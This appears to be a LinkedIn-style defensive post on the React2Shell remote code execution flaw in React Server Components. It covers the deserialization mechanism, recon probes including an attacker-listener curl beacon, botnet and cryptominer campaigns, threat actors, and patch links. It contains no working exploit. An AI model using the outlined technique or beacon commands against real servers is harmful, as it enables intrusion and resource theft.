React-2-Shell!

If you’re running React 19 or Next.js 15+, the last few weeks probably felt less like development and more like emergency patch management. If you’re not, there’s a very real chance your application has already picked up a side hustle as an unpaid cryptominer.

So what actually happens when an attacker comes knocking? Not the dramatic “site goes down” kind of knock. This one is polite, quiet, and very patient.

Phase 1: Pre-Exploitation (Recon & The "Flight" Hijack)

The attack begins with mass scanning. Unlike traditional SQLi or XSS, attackers are looking specifically for Server Action endpoints that handle RSC payloads.

The Mechanics:

The "Flight" protocol is how React streams UI components from server to client. It uses a chunked serialization format. The vulnerability lies in insecure deserialization. By crafting a malicious chunk, attackers can:

1. Pollute the Prototype: Prototype Pollution: Specially structured payloads can influence the JavaScript prototype chain, causing server-side logic to resolve attacker-controlled properties.
2. The "Thenable" Trap: Trick the server into treating a piece of data as a Promise (a "thenable"). When the server tries to resolve it, it triggers the polluted then property.
3. Code Injection: Use the Function() constructor or require('child_process') within that polluted property to execute system commands.

The Recon Probe:

Initial payloads are rarely destructive. Attackers use "Proof of Execution" (PoE) commands to verify the server is vulnerable:

• DNS Beacons: Commands like curl <id>.oastify.com or ping to an attacker-controlled listener.
• Arithmetic Probes: For Example asking the server to calculate 40302 * 41082. If the response contains 1655766164 , the RCE is confirmed.

Phase 2: Post-Exploitation (Campaigns & Chaos)

Once the "bridge" is established (often marked by the string wow i guess im finna bridge now in early PoCs), the automation takes over. We are seeing three primary campaign clusters:

1. The "Nuts" Campaign (Mirai-Style)

This is the "noisy" neighbor. It focuses on high-volume botnet enrollment.

• Identifier: Uses the tag reactOnMynuts in payloads.
• Activity: Downloads a shell script (nuts.sh) that pulls architecture-specific binaries (x86, bolts).
• Goal: Enrolling the server into a Mirai-based botnet for DDoS attacks.

2. The "RondoDoX" Botnet

A more persistent threat targeting both IoT and high-performance web servers.

• Stealth Tactics: Renames its binaries to [kswapd1] or nginxs to blend into the process list.
• The "Killer" Script: It actively scans /proc every 45 seconds to find and kill other hackers' miners. It wants 100% of your CPU for itself.
• Persistence: Sets up systemd services and crontabs to ensure it survives a reboot.

3. The "C3Pool" Mining Wave

Many opportunistic attackers are simply looking for a quick payout via Monero (XMR).

• Payload: Drops the XMRig miner.
• Network: Connects to the C3Pool mining network.
• Impact: Your cloud bill spikes as the miner consumes all available compute resources.

4. Key Threat Actors Involved

• State-Sponsored: China-nexus groups (Earth Lamia, Jackpot Panda) and North Korean actors were observed deploying backdoors (HISONIC, EtherRAT) within 48 hours of disclosure.Cybercriminals: Widespread deployment of XMRig cryptominers and Linux Loaders targeted smaller businesses, using their server resources for illicit profit.
• Vulnerable Surface: Shortly after disclosure, security researchers identified over 165,000 unique IP addresses and more than 644,000 domains running vulnerable versions of React Server Components (RSC).
• Attack Volume: Cloudflare reported a staggering 582 million exploit attempts within the first week of disclosure, averaging roughly 3.49 million probes per hour.

If you’ve reached this far, I’ve dropped the full IOC list and patching manifest links below. Honestly? Time mile to patch karlena. With a "Time to Exploit" for React2Shell clocking in at under 30 hours, that standard 72-hour enterprise "Emergency" window isn't a safety net it’s a head start for the bad guys. Don't be the one providing the compute for someone else's botnet.

Links:

https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html

https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/

https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components

https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

https://nextjs.org/blog/security-update-2025-12-11

#React2Shell #ApplicationSecurity #WebSecurity #CloudSecurity #IncidentResponse #ThreatResearch #Infosec #CyberSecurity#ReactJS#NextJS#ServerSideSecurity #RCE#ThreatHunting